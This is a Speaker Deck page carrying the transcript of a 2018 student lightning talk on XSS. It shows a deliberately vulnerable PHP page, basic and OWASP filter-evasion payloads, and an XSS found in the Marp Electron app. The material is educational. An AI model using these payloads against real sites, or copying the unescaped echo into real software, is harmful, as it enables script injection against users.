Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.4k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
46
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
130
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
260
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
350
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
790
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
350
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
150
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
160
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
280
Other Decks in Technology
See All in Technology
権威ドキュメントで振り返る2024 #年忘れセキュリティ2024
hirotomotaguchi
2
750
Opcodeを読んでいたら何故かphp-srcを読んでいた話
murashotaro
0
260
Snykで始めるセキュリティ担当者とSREと開発者が楽になる脆弱性対応 / Getting started with Snyk Vulnerability Response
yamaguchitk333
2
190
DevFest 2024 Incheon / Songdo - Compose UI 조합 심화
wisemuji
0
110
株式会社ログラス − エンジニア向け会社説明資料 / Loglass Comapany Deck for Engineer
loglass2019
3
32k
TSKaigi 2024 の登壇から広がったコミュニティ活動について
tsukuha
0
160
Oracle Cloudの生成AIサービスって実際どこまで使えるの? エンジニア目線で試してみた
minorun365
PRO
4
280
alecthomas/kong はいいぞ / kamakura.go#7
fujiwara3
1
300
組織に自動テストを書く文化を根付かせる戦略(2024冬版) / Building Automated Test Culture 2024 Winter Edition
twada
PRO
17
4.5k
サイボウズフロントエンドエキスパートチームについて / FrontendExpert Team
cybozuinsideout
PRO
5
38k
Amazon VPC Lattice 最新アップデート紹介 - PrivateLink も似たようなアップデートあったけど違いとは
bigmuramura
0
200
オプトインカメラ:UWB測位を応用したオプトイン型のカメラ計測
matthewlujp
0
180
Featured
See All Featured
Building Better People: How to give real-time feedback that sticks.
wjessup
365
19k
YesSQL, Process and Tooling at Scale
rocio
169
14k
Reflections from 52 weeks, 52 projects
jeffersonlam
347
20k
GraphQLとの向き合い方2022年版
quramy
44
13k
Measuring & Analyzing Core Web Vitals
bluesmoon
4
170
How to train your dragon (web standard)
notwaldorf
88
5.7k
[RailsConf 2023] Rails as a piece of cake
palkan
53
5k
Into the Great Unknown - MozCon
thekraken
33
1.5k
Gamification - CAS2011
davidbonilla
80
5.1k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
247
1.3M
GraphQLの誤解/rethinking-graphql
sonatard
67
10k
Put a Button on it: Removing Barriers to Going Fast.
kastner
59
3.6k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron